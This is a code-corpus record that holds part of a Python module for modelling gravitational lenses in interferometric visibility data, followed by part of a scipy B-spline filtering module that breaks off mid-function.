real = np.concatenate((self.real,self.real))
imag = np.concatenate((self.imag,-self.imag))
sigma = np.concatenate((self.sigma,self.sigma))
ant1 = np.concatenate((self.ant1,self.ant2))
ant2 = np.concatenate((self.ant2,self.ant1))
self.u = u
self.v = v
self.real = real
self.imag = imag
self.sigma = sigma
self.ant1 = ant1
self.ant2 = ant2
def to_binfile(self,filename,overwrite=False):
"""
Write out the visibility data to a .bin file that can then be read by
vl.read_visdata.
filename: string
File to write out to. Will have '.bin' appended to it if not already given.
overwrite: boolean
If filename already exists and overwrite=False, will not overwrite existing file.
"""
allarr = np.vstack((self.u,self.v,self.real,self.imag,self.sigma,self.ant1,self.ant2))
if not filename[-4:] == '.bin': filename += '.bin'
if os.path.isfile(filename) and not overwrite:
raise IOError('filename {0:s} exists and overwrite=False; '\
'use visdata.to_binfile(filename,overwrite=True) to overwrite')
with open(filename,'wb') as f:
allarr.tofile(f)
f.write(self.PBfwhm)
class SIELens(object):
"""
Class to hold parameters for an SIE lens, with each parameter (besides
redshift) a dictionary.
Example format of each parameter:
x = {'value':x0,'fixed':False,'prior':[xmin,xmax]}, where x0 is the
initial/current value of x, x should not be a fixed parameter during fitting,
and the value of x must be between xmin and xmax.
Note: in my infinite future free time, will probably replace e and PA with
the x and y components of the ellipticity, which are better behaved as e->0.
Parameters:
z
Lens redshift. If unknown, any value can be chosen as long as it is
less than the source redshift you know/assume.
x, y
Position of the lens, in arcseconds relative to the phase center of
the data (or any other reference point of your choosing). +x is west
(sorry not sorry), +y is north.
M
Lens mass, in Msun. With the lens and source redshifts, sets the
overall "strength" of the lens. Can be converted to an Einstein radius
using theta_Ein = (4*G*M * D_LS / (c**2 * D_L * D_S))**0.5, in radians,
with G and c the gravitational constant and speed of light, and D_L, D_S
and D_LS the distances to the lens, source, and between the lens and source,
respectively.
e
Lens ellipticity, ranging from 0 (a circularly symmetric lens) to 1 (a very
elongated lens).
PA
Lens major axis position angle, in degrees east of north.
"""
def __init__(self,z,x,y,M,e,PA):
# Do some input handling.
if not isinstance(x,dict):
x = {'value':x,'fixed':False,'prior':[-30.,30.]}
if not isinstance(y,dict):
y = {'value':y,'fixed':False,'prior':[-30.,30.]}
if not isinstance(M,dict):
M = {'value':M,'fixed':False,'prior':[1e7,1e15]}
if not isinstance(e,dict):
e = {'value':e,'fixed':False,'prior':[0.,1.]}
if not isinstance(PA,dict):
PA = {'value':PA,'fixed':False,'prior':[0.,180.]}
if not all(['value' in d for d in [x,y,M,e,PA]]):
raise KeyError("All parameter dicts must contain the key 'value'.")
if not 'fixed' in x: x['fixed'] = False
if not 'fixed' in y: y['fixed'] = False
if not 'fixed' in M: M['fixed'] = False
if not 'fixed' in e: e['fixed'] = False
if not 'fixed' in PA: PA['fixed'] = False
if not 'prior' in x: x['prior'] = [-30.,30.]
if not 'prior' in y: y['prior'] = [-30.,30.]
if not 'prior' in M: M['prior'] = [1e7,1e15]
if not 'prior' in e: e['prior'] = [0.,1.]
if not 'prior' in PA: PA['prior'] = [0.,180.]
self.z = z
self.x = x
self.y = y
self.M = M
self.e = e
self.PA = PA
# Here we keep a Boolean flag which tells us whether one of the lens
# properties has changed since the last time we did the lensing
# deflections. If everything is the same, we don't need to lens twice.
self._altered = True
def deflect(self,xim,yim,Dd,Ds,Dds):
"""
Follow Kormann+1994 for the lensing deflections.
Parameters:
xim, yim
2D Arrays of image coordinates we're going to lens,
probably generated by np.meshgrid.
Dd, Ds, Dds
Distances to the lens, source and between the source
and lens (units don't matter as long as they're the
same). Can't be calculated only from lens due to source
distances.
"""
if self._altered: # Only redo if something is new.
ximage, yimage = xim.copy(), yim.copy() # for safety.
f = 1. - self.e['value']
fprime = np.sqrt(1. - f**2.)
# K+94 parameterizes in terms of LOS velocity dispersion and then
# basically the Einstein radius.
sigma = ((self.M['value']*Ds*G*Msun*c**2.)/(4*np.pi**2. * Dd*Dds*Mpc))**(1/4.)
Xi0 = 4*np.pi * (sigma/c)**2. * (Dd*Dds/Ds)
# Flip units, the recenter and rotate grid to lens center and major axis
ximage *= arcsec2rad; yimage *= arcsec2rad
ximage -= (self.x['value']*arcsec2rad)
yimage -= (self.y['value']*arcsec2rad)
if not np.isclose(self.PA['value'], 0.):
r,theta = cart2pol(ximage,yimage)
ximage,yimage = pol2cart(r,theta-(self.PA['value']*deg2rad))
phi = np.arctan2(yimage,ximage)
# Calculate the deflections, account for e=0 (the SIS), which has
# cancelling infinities. K+94 eq 27a.
if np.isclose(f, 1.):
dxs = -(Xi0/Dd)*np.cos(phi)
dys = -(Xi0/Dd)*np.sin(phi)
else:
dxs = -(Xi0/Dd)*(np.sqrt(f)/fprime)*np.arcsinh(np.cos(phi)*fprime/f)
dys = -(Xi0/Dd)*(np.sqrt(f)/fprime)*np.arcsin(np.sin(phi)*fprime)
# Rotate and shift back to sky frame
if not np.isclose(self.PA['value'], 0.):
r,theta = cart2pol(dxs,dys)
dxs,dys = pol2cart(r,theta+(self.PA['value']*deg2rad))
dxs *= rad2arcsec; dys *= rad2arcsec
self.deflected_x = dxs
self.deflected_y = dys
self._altered = False
class ExternalShear(object):
"""
Class to hold the two parameters relating to an external tidal shear,
where each parameter is a dictionary.
Example format of each parameter:
x = {'value':x0,'fixed':False,'prior':[xmin,xmax]}, where x0 is the
initial/current value of x, x should not be a fixed parameter during fitting,
and the value of x must be between xmin and xmax.
Parameters:
shear:
The strength of the external shear. Should be 0 to 1 (although treating
other objects in the lensing environment like this is really only valid
for shear <~ 0.3).
shearangle
The position angle of the tidal shear, in degrees east of north.
"""
def __init__(self,shear,shearangle):
# Do some input handling.
if not isinstance(shear,dict):
shear = {'value':shear,'fixed':False,'prior':[0.,1.]}
if not isinstance(shearangle,dict):
shearangle = {'value':shearangle,'fixed':False,'prior':[0.,180.]}
if not all(['value' in d for d in [shear,shearangle]]):
raise KeyError("All parameter dicts must contain the key 'value'.")
if not 'fixed' in shear: shear['fixed'] = False
if not 'fixed' in shearangle: shearangle['fixed'] = False
if not 'prior' in shear: shear['prior'] = [0.,1.]
if not 'prior' in shearangle: shearangle['prior'] = [0.,180.]
self.shear = shear
self.shearangle = shearangle
def deflect(self,xim,yim,lens):
"""
Calculate deflection following Keeton,Mao,Witt 2000.
Parameters:
xim, yim
2D Arrays of image coordinates we're going to lens,
probably generated by np.meshgrid.
lens
A lens object; we use this to shift the coordinate system
to be centered on the lens.
"""
ximage,yimage = xim.copy(), yim.copy()
ximage -= lens.x['value']; yimage -= lens.y['value']
if not np.isclose(lens.PA['value'], 0.):
r,theta = cart2pol(ximage,yimage)
ximage,yimage = pol2cart(r,theta-(lens.PA['value']*deg2rad))
# KMW2000, altered for our coordinate convention.
g,thg = self.shear['value'], (self.shearangle['value']-lens.PA['value'])*deg2rad
dxs = -g*np.cos(2*thg)*ximage - g*np.sin(2*thg)*yimage
dys = -g*np.sin(2*thg)*ximage + g*np.cos(2*thg)*yimage
if not np.isclose(lens.PA['value'], 0.):
r,theta = cart2pol(dxs,dys)
dxs,dys = pol2cart(r,theta+(lens.PA['value']*deg2rad))
self.deflected_x = dxs; self.deflected_y = dys
class SersicSource(object):
"""
Class to hold parameters of an elliptical Sersic light profile, ie
I(x,y) = A * exp(-bn*((r/reff)^(1/n)-1)),
where bn makes reff enclose half the light (varies with Sersic index),
and all the variable parameters are dictionaries. This profile is
parameterized by the major axis and axis ratio; you can get the half-light
radius with r_eff = majax * sqrt(axisratio).
Example format of each parameter:
x = {'value':x0,'fixed':False,'prior':[xmin,xmax]}, where x0 is the
initial/current value of x, x should not be a fixed parameter during fitting,
and the value of x must be between xmin and xmax.
Parameters:
z
Source redshift. Can be made up, as long as it's higher than
the lens redshift.
lensed
True/False flag determining whether this object is actually lensed
(in which case it gets run through the lensing equations) or not (in
which case it's simply added to the model of the field without lensing).
This also determines the convention for the source position coordinates,
see below.
x, y
Position of the source in arcseconds. If lensed is True, this position
is relative to the position of the lens (or the first lens in a list of
lenses). If lensed is False, this position is relative to the field
center (or (0,0) coordinates). +x is west (sorry not sorry), +y is north.
flux
Total integrated flux density of the source (ie, NOT peak pixel value), in
units of Jy.
majax
The source major axis in arcseconds.
index
The Sersic profile index n (0.5 is ~Gaussian, 1 is ~an exponential disk, 4
is a de Vaucoleurs profile).
axisratio
The source minor/major axis ratio, varying from 1 (circularly symmetric) to
0 (highly elongated).
PA
Source position angle. If lensed is True, this is in degrees CCW from the
lens major axis (or first lens in a list of them). If lensed is False, this
is in degrees east of north.
"""
def __init__(self,z,lensed=True,xoff=None,yoff=None,flux=None,majax=None,\
index=None,axisratio=None,PA=None):
# Do some input handling.
if not isinstance(xoff,dict):
xoff = {'value':xoff,'fixed':False,'prior':[-10.,10.]}
if not isinstance(yoff,dict):
yoff = {'value':yoff,'fixed':False,'prior':[-10.,10.]}
if not isinstance(flux,dict):
flux = {'value':flux,'fixed':False,'prior':[1e-5,1.]} # 0.01 to 1Jy source
if not isinstance(majax,dict):
majax = {'value':majax,'fixed':False,'prior':[0.,2.]} # arcsec
if not isinstance(index,dict):
index = {'value':index,'fixed':False,'prior':[0.3,4.]}
if not isinstance(axisratio,dict):
axisratio = {'value':axisratio,'fixed':False,'prior':[0.01,1.]}
if not isinstance(PA,dict):
PA = {'value':PA,'fixed':False,'prior':[0.,180.]}
if not all(['value' in d for d in [xoff,yoff,flux,majax,index,axisratio,PA]]):
raise KeyError("All parameter dicts must contain the key 'value'.")
if not 'fixed' in xoff: xoff['fixed'] = False
if not 'fixed' in yoff: yoff['fixed'] = False
if not 'fixed' in flux: flux['fixed'] = False
if not 'fixed' in majax: majax['fixed'] = False
if not 'fixed' in index: index['fixed'] = False
if not 'fixed' in axisratio: axisratio['fixed'] = False
if not 'fixed' in PA: PA['fixed'] = False
if not 'prior' in xoff: xoff['prior'] = [-10.,10.]
if not 'prior' in yoff: yoff['prior'] = [-10.,10.]
if not 'prior' in flux: flux['prior'] = [1e-5,1.]
if not 'prior' in majax: majax['prior'] = [0.,2.]
if not 'prior' in index: index['prior'] = [1/3.,10]
if not 'prior' in axisratio: axisratio['prior'] = [0.01,1.]
if not 'prior' in PA: PA['prior'] = [0.,180.]
self.z = z
self.lensed = lensed
self.xoff = xoff
self.yoff = yoff
self.flux = flux
self.majax = majax
self.index = index
self.axisratio = axisratio
self.PA = PA
class GaussSource(object):
"""
Class to hold parameters of a circularly symmetric Gaussian light
profile, where all the variable parameters are dictionaries.
Example format of each parameter:
x = {'value':x0,'fixed':False,'prior':[xmin,xmax]}, where x0 is the
initial/current value of x, x should not be a fixed parameter during fitting,
and the value of x must be between xmin and xmax.
Parameters:
z
Source redshift. Can be made up, as long as it's higher than
the lens redshift.
lensed
True/False flag determining whether this object is actually lensed
(in which case it gets run through the lensing equations) or not (in
which case it's simply added to the model of the field without lensing).
This also determines the convention for the source position coordinates,
see below.
x, y
Position of the source in arcseconds. If lensed is True, this position
is relative to the position of the lens (or the first lens in a list of
lenses). If lensed is False, this position is relative to the field
center (or (0,0) coordinates). +x is west (sorry not sorry), +y is north.
flux
Total integrated flux density of the source (ie, NOT peak pixel value), in
units of Jy.
width
The Gaussian width (sigma) of the light profile, in arcseconds.
"""
def __init__(self,z,lensed=True,xoff=None,yoff=None,flux=None,width=None):
# Do some input handling.
if not isinstance(xoff,dict):
xoff = {'value':xoff,'fixed':False,'prior':[-10.,10.]}
if not isinstance(yoff,dict):
yoff = {'value':yoff,'fixed':False,'prior':[-10.,10.]}
if not isinstance(flux,dict):
flux = {'value':flux,'fixed':False,'prior':[1e-5,1.]} # 0.01 to 1Jy source
if not isinstance(width,dict):
width = {'value':width,'fixed':False,'prior':[0.,2.]} # arcsec
if not all(['value' in d for d in [xoff,yoff,flux,width]]):
raise KeyError("All parameter dicts must contain the key 'value'.")
if not 'fixed' in xoff: xoff['fixed'] = False
if not 'fixed' in yoff: yoff['fixed'] = False
if not 'fixed' in flux: flux['fixed'] = False
if not 'fixed' in width: width['fixed'] = False
if not 'prior' in xoff: xoff['prior'] = [-10.,10.]
if not 'prior' in yoff: yoff['prior'] = [-10.,10.]
if not 'prior' in flux: flux['prior'] = [1e-5,1.]
if not 'prior' in width: width['prior'] = [0.,2.]
self.z = z
self.lensed = lensed
self.xoff = xoff
self.yoff = yoff
self.flux = flux
self.width = width
class PointSource(object):
"""
Class to hold parameters of an (unlensed) object unresolved by
the data, where all the variable parameters are dictionaries.
Example format of each parameter:
x = {'value':x0,'fixed':False,'prior':[xmin,xmax]}, where x0 is the
initial/current value of x, x should not be a fixed parameter during fitting,
and the value of x must be between xmin and xmax.
NOTE: Having a lensed point source is not currently implemented.
Parameters:
z
Source redshift. Can be made up, as long as it's higher than
the lens redshift.
lensed
True/False flag determining whether this object is actually lensed
(in which case it gets run through the lensing equations) or not (in
which case it's simply added to the model of the field without lensing).
This also determines the convention for the source position coordinates,
see below.
x, y
Position of the source in arcseconds. If lensed is False (it must be),
this position is relative to the field center (or (0,0) coordinates).
+x is west (sorry not sorry), +y is north.
flux
Total flux density of the source, in units of Jy.
"""
def __init__(self,z,lensed=True,xoff=None,yoff=None,flux=None):
# Do some input handling.
if not isinstance(xoff,dict):
xoff = {'value':xoff,'fixed':False,'prior':[-10.,10.]}
if not isinstance(yoff,dict):
yoff = {'value':yoff,'fixed':False,'prior':[-10.,10.]}
if not isinstance(flux,dict):
flux = {'value':flux,'fixed':False,'prior':[1e-5,1.]} # 0.01 to 1Jy source
if not all(['value' in d for d in [xoff,yoff,flux]]):
raise KeyError("All parameter dicts must contain the key 'value'.")
if not 'fixed' in xoff: xoff['fixed'] = False
if not 'fixed' in yoff: yoff['fixed'] = False
if not 'fixed' in flux: flux['fixed'] = False
if not 'prior' in xoff: xoff['prior'] = [-10.,10.]
if not 'prior' in yoff: yoff['prior'] = [-10.,10.]
if not 'prior' in flux: flux['prior'] = [1e-5,1.]
self.z = z
self.lensed = lensed
self.xoff = xoff
self.yoff = yoff
self.flux = flux
def read_visdata(filename):
"""
Function to read in visibility data from file and create a visdata object
to hold it afterwards. So far only .bin files from get_visibilities.py are
supported; idea is eventually to be able to not mess with that and get straight
from a CASA ms, but don't currently know how to do that without bundling the
casacore utilities directly...
Params:
filename
Name of file to read from. Should contain all the visibility data needed,
including u (Lambda), v (Lambda), real, imag, sigma, antenna1, and antenna 2.
Returns:
visdata
A visdata object containing the data from filename.
"""
if not filename.split('.')[-1].lower() in ['bin']:
raise ValueError('Only .bin files are supported for now...')
data = np.fromfile(filename)
PBfwhm = data[-1]
data = data[:-1]
data = data.reshape(7,data.size//7) # bin files lose array shape, so reshape to match
data = Visdata(*data,PBfwhm=PBfwhm,filename=filename)
# Check for auto-correlations:
if (data.u == 0).sum() > 0:
warnings.warn("Found autocorrelations when reading the data (u == v == 0); removing them...")
bad = data.u == 0
data = Visdata(data.u[~bad],data.v[~bad],data.real[~bad],data.imag[~bad],data.sigma[~bad],
data.ant1[~bad],data.ant2[~bad],data.PBfwhm,data.filename)
# Check for flagged / otherwise bad data
if (data.amp == 0).sum() > 0:
warnings.warn("Found flagged/bad data when reading the data (amplitude == 0); removing them...")
bad = data.amp == 0
data = Visdata(data.u[~bad],data.v[~bad],data.real[~bad],data.imag[~bad],data.sigma[~bad],
data.ant1[~bad],data.ant2[~bad],data.PBfwhm,data.filename)
return data
def concatvis(visdatas):
"""
Concatenate multiple visibility sets into one larger set.
Does no consistency checking of any kind, so beware.
:param visdatas:
List of visdata objects
This method returns:
* ``concatvis'' - The concatenated visibility set.
"""
newu, newv, newr, newi = np.array([]),np.array([]),np.array([]),np.array([])
news, newa1,newa2 = np.array([]),np.array([]),np.array([])
for vis in visdatas:
newu = np.concatenate((newu,vis.u))
newv = np.concatenate((newv,vis.v))
newr = np.concatenate((newr,vis.real))
newi = np.concatenate((newi,vis.imag))
news = np.concatenate((news,vis.sigma))
newa1= np.concatenate((newa1,vis.ant1))
newa2= np.concatenate((newa2,vis.ant2))
return Visdata(newu,newv,newr,newi,news,newa1,newa2,visdatas[0].PBfwhm,'Combined Data')
def bin_visibilities(visdata,maxnewsize=None):
"""
WARNING: DOESN'T WORK CURRENTLY(?)
Bins up (ie, averages down) visibilities to reduce the total
number of them. Note that since we fit directly to the visibilities,
this is slightly different (and easier) than gridding in preparation for
imaging, as we won't need to FFT and so don't need a convolution function.
:param visdata
A Visdata object.
:param maxnewsize = None
If desired, the maximum number of visibilities post-binning can
be specified. As long as this number meets other criteria (ie,
we don't have bin sizes smaller than an integration time or
bandwidth in wavelengths), the total number in the returned
Visdata will have fewer than maxnewsize visibilities.
This method returns:
* ``BinnedVisibilities'' - A Visdata object containing binned visibilities.
"""
if maxnewsize is None: maxnewsize = visdata.u.size/2
# Bins should be larger than an integration; strictly only valid for an EW array,
# and assumes a 20s integration time. Thus, this is a conservative estimate.
minbinsize = 20. * visdata.uvdist.max() / (24*3600.)
# Bins should be smaller than the effective field size
maxbinsize = (visdata.PBfwhm * arcsec2rad)**-1
print(minbinsize,maxbinsize)
# We're going to find a binning solution iteratively; this gets us set up
Nbins, binsizeunmet, Nvis, it, maxiter = [3000,3000], True, visdata.u.size, 0, 250
while (binsizeunmet or Nvis >= maxnewsize):
print(Nbins)
# Figure out how to bin up the data
counts,uedges,vedges,bins = stats.binned_statistic_2d(
visdata.u,visdata.v,values=visdata.real,statistic='count',
bins=Nbins)
du, dv = uedges[1]-uedges[0], vedges[1]-vedges[0]
# Check that our bins in u and v meet our conditions
if (du > minbinsize and du < maxbinsize and
dv > minbinsize and dv < maxbinsize): binsizeunmet = False
# Otherwise we have to adjust the number of bins to adjust their size...
#elif (du <= minbinsize or dv <= minbinsize): Nbins = int(Nbins/1.2)
#elif (du >= maxbinsize or dv >= maxbinsize): Nbins = int(Nbins*1.2)
elif du <= minbinsize: Nbins[0] = int(Nbins[0]/1.1); binsizeunmet=True
elif dv <= minbinsize: Nbins[1] = int(Nbins[1]/1.1); binsizeunmet=True
elif du >= maxbinsize: Nbins[0] = int(Nbins[0]*1.1); binsizeunmet=True
elif dv >= maxbinsize: Nbins[1] = int(Nbins[1]*1.1); binsizeunmet=True
# If we still have more than the desired number of visibilities, make
# fewer bins (we'll loop after this).
if np.unique(bins).size > maxnewsize: Nbins[0],Nbins[1] = int(Nbins[0]/1.1),int(Nbins[1]/1.1)
Nvis = np.unique(bins).size
it += 1
if it > maxiter: raise ValueError("It's impossible to split your data into that few bins! "
"Try setting maxnewsize to a larger value!")
print(Nvis,du,dv)
# Get us some placeholder arrays for the binned data
u,v,real,imag,sigma,ant1,ant2 = np.zeros((7,Nvis))
for i,filledbin in enumerate(np.unique(bins)):
# This tells us which visibilities belong to the current bin
points = np.where(bins==filledbin)[0]
# This unravels the indices to uedges,vedges from the binned_statistic binnumber
uloc = int(np.floor(filledbin/(vedges.size+1)) - 1)
vloc = int(filledbin - (vedges.size+1)*(uloc+1) - 1)
# Get our new data, place at center of uv bins
u[i],v[i] = uedges[uloc]+0.5*du, vedges[vloc]+0.5*dv
real[i],sumwt = np.average(visdata.real[points],weights=visdata.sigma[points]**-2.,returned=True)
imag[i] = np.average(visdata.imag[points],weights=visdata.sigma[points]**-2.)
sigma[i] = sumwt**-0.5
# We can keep the antenna numbers if we've only selected points from the same baseline,
# otherwise get rid of them (CHECK IF MODELCAL FAILS WITH None ANTENNAS)
ant1[i] = visdata.ant1[points][0] if (visdata.ant1[points]==visdata.ant1[points][0]).all() else None
ant2[i] = visdata.ant2[points][0] if (visdata.ant2[points]==visdata.ant2[points][0]).all() else None
return Visdata(u,v,real,imag,sigma,ant1,ant2,visdata.PBfwhm,'BIN{0}'.format(Nvis)+visdata.filename)
|
jspilker/visilens
|
visilens/class_utils.py
|
Python
|
mit
| 32,136
|
[
"Gaussian"
] |
149843eb03e30fc0a2ad74bbf7bc6539126517c55cf060d3400826fedbb12381
|
from __future__ import division, print_function, absolute_import
from scipy._lib.six import xrange
from numpy import (logical_and, asarray, pi, zeros_like,
piecewise, array, arctan2, tan, zeros, arange, floor)
from numpy.core.umath import (sqrt, exp, greater, less, cos, add, sin,
less_equal, greater_equal)
# From splinemodule.c
from .spline import cspline2d, sepfir2d
from scipy.special import comb, gamma
__all__ = ['spline_filter', 'bspline', 'gauss_spline', 'cubic', 'quadratic',
'cspline1d', 'qspline1d', 'cspline1d_eval', 'qspline1d_eval']
def factorial(n):
return gamma(n + 1)
def spline_filter(Iin, lmbda=5.0):
"""Smoothing spline (cubic) filtering of a rank-2 array.
Filter an input data set, `Iin`, using a (cubic) smoothing spline of
fall-off `lmbda`.
"""
intype = Iin.dtype.char
hcol = array([1.0, 4.0, 1.0], 'f') / 6.0
if intype in ['F', 'D']:
Iin = Iin.astype('F')
ckr = cspline2d(Iin.real, lmbda)
cki = cspline2d(Iin.imag, lmbda)
outr = sepfir2d(ckr, hcol, hcol)
outi = sepfir2d(cki, hcol, hcol)
out = (outr + 1j * outi).astype(intype)
elif intype in ['f', 'd']:
ckr = cspline2d(Iin, lmbda)
out = sepfir2d(ckr, hcol, hcol)
out = out.astype(intype)
else:
raise TypeError("Invalid data type for Iin")
return out
_splinefunc_cache = {}
def _bspline_piecefunctions(order):
"""Returns the function defined over the left-side pieces for a bspline of
a given order.
The 0th piece is the first one less than 0. The last piece is a function
identical to 0 (returned as the constant 0). (There are order//2 + 2 total
pieces).
Also returns the condition functions that when evaluated return boolean
arrays for use with `numpy.piecewise`.
"""
try:
return _splinefunc_cache[order]
except KeyError:
pass
def condfuncgen(num, val1, val2):
if num == 0:
return lambda x: logical_and(less_equal(x, val1),
greater_equal(x, val2))
elif num == 2:
return lambda x: less_equal(x, val2)
else:
return lambda x: logical_and(less(x, val1),
greater_equal(x, val2))
last = order // 2 + 2
if order % 2:
startbound = -1.0
else:
startbound = -0.5
condfuncs = [condfuncgen(0, 0, startbound)]
bound = startbound
for num in xrange(1, last - 1):
condfuncs.append(condfuncgen(1, bound, bound - 1))
bound = bound - 1
condfuncs.append(condfuncgen(2, 0, -(order + 1) / 2.0))
# final value of bound is used in piecefuncgen below
# the functions to evaluate are taken from the left-hand-side
# in the general expression derived from the central difference
# operator (because they involve fewer terms).
fval = factorial(order)
def piecefuncgen(num):
Mk = order // 2 - num
if (Mk < 0):
return 0 # final function is 0
coeffs = [(1 - 2 * (k % 2)) * float(comb(order + 1, k, exact=1)) / fval
for k in xrange(Mk + 1)]
shifts = [-bound - k for k in xrange(Mk + 1)]
def thefunc(x):
res = 0.0
for k in range(Mk + 1):
res += coeffs[k] * (x + shifts[k]) ** order
return res
return thefunc
funclist = [piecefuncgen(k) for k in xrange(last)]
_splinefunc_cache[order] = (funclist, condfuncs)
return funclist, condfuncs
def bspline(x, n):
"""B-spline basis function of order n.
Notes
-----
Uses numpy.piecewise and automatic function-generator.
"""
ax = -abs(asarray(x))
# number of pieces on the left-side is (n+1)/2
funclist, condfuncs = _bspline_piecefunctions(n)
condlist = [func(ax) for func in condfuncs]
return piecewise(ax, condlist, funclist)
def gauss_spline(x, n):
"""Gaussian approximation to B-spline basis function of order n.
"""
signsq = (n + 1) / 12.0
return 1 / sqrt(2 * pi * signsq) * exp(-x ** 2 / 2 / signsq)
def cubic(x):
"""A cubic B-spline.
This is a special case of `bspline`, and equivalent to ``bspline(x, 3)``.
"""
ax = abs(asarray(x))
res = zeros_like(ax)
cond1 = less(ax, 1)
if cond1.any():
ax1 = ax[cond1]
res[cond1] = 2.0 / 3 - 1.0 / 2 * ax1 ** 2 * (2 - ax1)
cond2 = ~cond1 & less(ax, 2)
if cond2.any():
ax2 = ax[cond2]
res[cond2] = 1.0 / 6 * (2 - ax2) ** 3
return res
def quadratic(x):
"""A quadratic B-spline.
This is a special case of `bspline`, and equivalent to ``bspline(x, 2)``.
"""
ax = abs(asarray(x))
res = zeros_like(ax)
cond1 = less(ax, 0.5)
if cond1.any():
ax1 = ax[cond1]
res[cond1] = 0.75 - ax1 ** 2
cond2 = ~cond1 & less(ax, 1.5)
if cond2.any():
ax2 = ax[cond2]
res[cond2] = (ax2 - 1.5) ** 2 / 2.0
return res
def _coeff_smooth(lam):
xi = 1 - 96 * lam + 24 * lam * sqrt(3 + 144 * lam)
omeg = arctan2(sqrt(144 * lam - 1), sqrt(xi))
rho = (24 * lam - 1 - sqrt(xi)) / (24 * lam)
rho = rho * sqrt((48 * lam + 24 * lam * sqrt(3 + 144 * lam)) / xi)
return rho, omeg
def _hc(k, cs, rho, omega):
return (cs / sin(omega) * (rho ** k) * sin(omega * (k + 1)) *
greater(k, -1))
def _hs(k, cs, rho, omega):
c0 = (cs * cs * (1 + rho * rho) / (1 - rho * rho) /
(1 - 2 * rho * rho * cos(2 * omega) + rho ** 4))
gamma = (1 - rho * rho) / (1 + rho * rho) / tan(omega)
ak = abs(k)
return c0 * rho ** ak * (cos(omega * ak) + gamma * sin(omega * ak))
def _cubic_smooth_coeff(signal, lamb):
rho, omega = _coeff_smooth(lamb)
cs = 1 - 2 * rho * cos(omega) + rho * rho
K = len(signal)
yp = zeros((K,), signal.dtype.char)
k = arange(K)
yp[0] = (_hc(0, cs, rho, omega) * signal[0] +
add.reduce(_hc(k + 1, cs, rho, omega) * signal))
yp[1] = (_hc(0, cs, rho, omega) * signal[0] +
_hc(1, cs, rho, omega) * signal[1] +
add.reduce(_hc(k + 2, cs, rho, omega) * signal))
for n in range(2, K):
yp[n] = (cs * signal[n] + 2 * rho * cos(omega) * yp[n - 1] -
rho * rho * yp[n - 2])
y = zeros((K,), signal.dtype.char)
y[K - 1] = add.reduce((_hs(k, cs, rho, omega) +
_hs(k + 1, cs, rho, omega)) * signal[::-1])
y[K - 2] = add.reduce((_hs(k - 1, cs, rho, omega) +
_hs(k + 2, cs, rho, omega)) * signal[::-1])
for n in range(K - 3, -1, -1):
y[n] = (cs * yp[n] + 2 * rho * cos(omega) * y[n + 1] -
rho * rho * y[n + 2])
return y
def _cubic_coeff(signal):
zi = -2 + sqrt(3)
K = len(signal)
yplus = zeros((K,), signal.dtype.char)
powers = zi ** arange(K)
yplus[0] = signal[0] + zi * add.reduce(powers * signal)
for k in range(1, K):
yplus[k] = signal[k] + zi * yplus[k - 1]
output = zeros((K,), signal.dtype)
output[K - 1] = zi / (zi - 1) * yplus[K - 1]
for k in range(K - 2, -1, -1):
output[k] = zi * (output[k + 1] - yplus[k])
return output * 6.0
def _quadratic_coeff(signal):
zi = -3 + 2 * sqrt(2.0)
K = len(signal)
yplus = zeros((K,), signal.dtype.char)
powers = zi ** arange(K)
yplus[0] = signal[0] + zi * add.reduce(powers * signal)
for k in range(1, K):
yplus[k] = signal[k] + zi * yplus[k - 1]
output = zeros((K,), signal.dtype.char)
output[K - 1] = zi / (zi - 1) * yplus[K - 1]
for k in range(K - 2, -1, -1):
output[k] = zi * (output[k + 1] - yplus[k])
return output * 8.0
def cspline1d(signal, lamb=0.0):
"""
Compute cubic spline coefficients for rank-1 array.
Find the cubic spline coefficients for a 1-D signal assuming
mirror-symmetric boundary conditions. To obtain the signal back from the
spline representation mirror-symmetric-convolve these coefficients with a
length 3 FIR window [1.0, 4.0, 1.0]/ 6.0 .
Parameters
----------
signal : ndarray
A rank-1 array representing samples of a signal.
lamb : float, optional
Smoothing coefficient, default is 0.0.
Returns
-------
c : ndarray
Cubic spline coefficients.
"""
if lamb != 0.0:
return _cubic_smooth_coeff(signal, lamb)
else:
return _cubic_coeff(signal)
def qspline1d(signal, lamb=0.0):
"""Compute quadratic spline coefficients for rank-1 array.
Find the quadratic spline coefficients for a 1-D signal assuming
mirror-symmetric boundary conditions. To obtain the signal back from the
spline representation mirror-symmetric-convolve these coefficients with a
length 3 FIR window [1.0, 6.0, 1.0]/ 8.0 .
Parameters
----------
signal : ndarray
A rank-1 array representing samples of a signal.
lamb : float, optional
Smoothing coefficient (must be zero for now).
Returns
-------
c : ndarray
Cubic spline coefficients.
"""
if lamb != 0.0:
raise ValueError("Smoothing quadratic splines not supported yet.")
else:
return _quadratic_coeff(signal)
def cspline1d_eval(cj, newx, dx=1.0, x0=0):
"""Evaluate a spline at the new set of points.
`dx` is the old sample-spacing while `x0` was the old origin. In
other-words the old-sample points (knot-points) for which the `cj`
represent spline coefficients were at equally-spaced points of:
oldx = x0 + j*dx j=0...N-1, with N=len(cj)
Edges are handled using mirror-symmetric boundary conditions.
"""
newx = (asarray(newx) - x0) / float(dx)
res = zeros_like(newx, dtype=cj.dtype)
if res.size == 0:
return res
N = len(cj)
cond1 = newx < 0
cond2 = newx > (N - 1)
cond3 = ~(cond1 | cond2)
# handle general mirror-symmetry
res[cond1] = cspline1d_eval(cj, -newx[cond1])
res[cond2] = cspline1d_eval(cj, 2 * (N - 1) - newx[cond2])
newx = newx[cond3]
if newx.size == 0:
return res
result = zeros_like(newx, dtype=cj.dtype)
jlower = floor(newx - 2).astype(int) + 1
for i in range(4):
thisj = jlower + i
indj = thisj.clip(0, N - 1) # handle edge cases
result += cj[indj] * cubic(newx - thisj)
res[cond3] = result
return res
def qspline1d_eval(cj, newx, dx=1.0, x0=0):
"""Evaluate a quadratic spline at the new set of points.
`dx` is the old sample-spacing while `x0` was the old origin. In
other-words the old-sample points (knot-points) for which the `cj`
represent spline coefficients were at equally-spaced points of::
oldx = x0 + j*dx j=0...N-1, with N=len(cj)
Edges are handled using mirror-symmetric boundary conditions.
"""
newx = (asarray(newx) - x0) / dx
res = zeros_like(newx)
if res.size == 0:
return res
N = len(cj)
cond1 = newx < 0
cond2 = newx > (N - 1)
cond3 = ~(cond1 | cond2)
# handle general mirror-symmetry
res[cond1] = qspline1d_eval(cj, -newx[cond1])
res[cond2] = qspline1d_eval(cj, 2 * (N - 1) - newx[cond2])
newx = newx[cond3]
if newx.size == 0:
return res
result = zeros_like(newx)
jlower = floor(newx - 1.5).astype(int) + 1
for i in range(3):
thisj = jlower + i
